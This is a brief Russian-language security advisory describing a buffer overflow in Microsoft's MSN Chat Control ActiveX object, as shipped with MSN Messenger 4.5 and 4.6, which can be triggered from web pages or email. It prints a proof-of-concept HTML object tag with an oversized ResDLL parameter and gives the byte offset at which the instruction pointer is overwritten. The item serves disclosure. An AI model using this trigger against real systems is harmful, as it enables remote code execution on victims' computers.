Microsoft MSN Chat Control — ActiveX объект, обеспечивающий функциональные возможности чата. Объект поставляется по умолчанию со многими продуктами Microsoft, включая последние версии MSN Messenger.

Microsoft MSN Chat Control уязвим к переполнению буфера и выполнению произвольного кода. Эта уязвимость может эксплуатироваться при просмотре Web
страниц или электронного сообщения.

Пример:

<object classid=»clsid:9088E688-063A-4806-A3DB-6522712FC061″ width=»455″
height=»523″>
<param name=»_cx» value=»12039″>
<param name=»_cy» value=»13838″>
<param name=»BackColor» value=»50331647″>
<param name=»ForeColor» value=»43594547″>
<param name=»RedirectURL» value=»»>
<param name=»ResDLL» value=»AAAAAAA[27,257 bytes is where the EIP starts]»>
</object>

Уязвимость обнаружена в Microsoft MSN Chat Control (Microsoft MSN Messenger 4.5
и 4.6).

Оставить мнение